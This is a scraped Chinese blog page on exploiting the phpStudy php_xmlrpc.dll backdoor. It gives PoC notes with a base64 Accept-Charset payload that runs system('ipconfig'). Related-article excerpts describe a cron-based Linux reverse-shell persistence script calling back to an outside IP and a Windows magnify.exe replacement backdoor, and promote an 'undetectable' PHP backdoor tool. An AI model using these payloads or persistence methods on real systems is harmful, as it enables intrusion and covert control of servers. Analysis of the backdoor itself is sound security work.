phpstudy后门利用

PHPStudy被爆出存在后门,PHP扩展的php_xmlrpc.dll文件被替换,攻击者向网站服务器发送特殊构造的HTTP请求即可执行任意PHP代码。

分析发现以下2个dll文件被替换并植入了后门:

php-5.4.45/ext/php_xmlrpc.dll
php-5.2.17/ext/php_xmlrpc.dll

在dll文件中搜索"eval("确实发现存在异常代码:

PoC:

注意:要把“gzip,deflate”逗号后面的空格删掉;“Accept-CharSet: c3lzdGVtKCdpcGNvbmZpZycpOw==”是base64编码后的形式,原文为:“Accept-CharSet: system(‘ipconfig‘);”。

奇安信写的分析文章:https://mp.weixin.qq.com/s/t-P-n98ZydP3aSCdC0C9hQ

原文地址:https://www.cnblogs.com/dgjnszf/p/11691405.html

时间: 2024-11-02 16:46:38

phpstudy后门利用的相关文章

phpstudy后门利用复现

一.漏洞位置 程序自带的PHP的php_xmlrpc.dll模块中有隐藏后门,受影响的版本有phpstudy2016(php5.2/5.4).phpstudy2018(php5.2/5.4)等版本. 这里我们用phpstudy2018版本的来验证后门位置及作用. 二.步骤 Step1:切换php的版本到5.2或者5.4,在phpstudy的根目录下找到phpStudy\PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll,使用记事本打开该文件,扫所eval.

使用Ghidra分析phpStudy后门

一.工具和平台 主要工具: Kali Linux Ghidra 9.0.4 010Editor 9.0.2 样本环境: Windows7 phpStudy 20180211 二 .分析过程 先在 Windows 7 虚拟机中安装 PhpStudy 20180211,然后把安装完后的目录拷贝到 Kali Linux 中. 根据网上公开的信息:后门存在于 php_xmlrpc.dll 文件中,里面存在“eval”关键字,文件 MD5 为 c339482fd2b233fb0a555b629c0ea5d

夜猫php强大后门利用工具[管理员永远查不出的后门利用程序]

之前博彩一个团队也是用我这个后门差不多维持了几个月 都没掉过!!! 现在公开这个脚本  希望支持!!! 下载地址:http://pan.baidu.com/s/1o7WQs2m 更多请关注博客 BY:1998 QQ:78654606

夜猫php强大后门利用工具第二版[管理员永远查不出的后门利用程序]

下载地址:http://pan.baidu.com/s/1pLvQMQv 合原版一样 功能加了几个 防止删除  使用方式:?shell=/php/zx.php

[转载]Linux后门整理合集(脉搏推荐)

我在思考要不要联系下....都禁止转载了.... 简介 利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能,保持反弹上线到公网机器. 利用方法 先创建 /etc/xxxx 脚本文件(名字自己改),利用该脚本进行反弹.以下脚本代表全自动反弹到 8.8.8.8 的 53 端口. nano /etc/xxxx #!/bin/bash if netstat -ano|grep -v grep | grep "8.8.8.8">/dev/null then echo

一个利用“永恒之蓝”漏洞传播的挖矿程序分析

背景介绍 近日,渔村安全团队追踪到一个利用永恒之蓝漏洞传播的挖矿程序,其具备高度的模块化和较强的传播能力,在短短数日就感染了数万台用户电脑.针对该突发情况,渔村安全团队迅速组织应急工作,最终使得目前的感染情况受到控制,下文为样本分析. 感染量 从微软发布ms17-010(永恒之蓝漏洞) 的修复补丁到现在已经过去四个月了,相继爆发的利用该漏洞传播的WannaCry,Petya 勒索病毒更是给 我们 上了一课.但目前来看,还是有不少用户没有及时更新补丁或者做相应的缓解措施,同时 Shadow Bro

各类后门整理!【白帽黑客必备生存技能】

Unix Bash 远控后门 简介 利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能,保持反弹上线到公网机器. 利用方法 先创建/etc/xxxx 脚本文件(名字自己改),利用该脚本进行反弹.以下脚本代表全自动反弹到 8.8.8.8 的 53 端口. nano /etc/xxxx #!/bin/bash if netstat -ano|grep -v grep | grep "8.8.8.8">/dev/null then echo "OK&q

震惊!WIN2003存在后门大全,提权成功率高

从某种意义上说,服务器被攻击是不可避免的,甚至被控制也情有可原.但绝对不能容忍的是,服务器被植入后门,攻击者如入无人之境,而管理者去浑然不觉.本文将对当前比较流行的后门技术进行解析,知己知彼方能杜绝后门. 1.放大镜后门 放大镜(magnify.exe)是Windows 2000/XP/2003系统集成的一个小工具,它是为方便视力障碍用户而设计的.在用户登录系统前可以通过"Win+U"组合键调用该工具,因此攻击者就用精心构造的magnify.exe同名文件替换放大镜程序,从而达到控制服

免考——webshell

目录 免考--webshell 一.webshell概念 二.Webshell获取--CMS获取WebShell 1.webshell获取 2.webshell密码破解 三.Webshell获取--非CMS获取WebShell 1.实际网站攻击(失败了) 2.利用文件上传漏洞 三.一句话后门利用及操作 执行中国菜刀 添加shell 连接一句话后门 执行文件操作 一句话后门整理 四.感悟 免考--webshell 一.webshell概念 webshell就是用来管理服务器的一个工具,以asp.p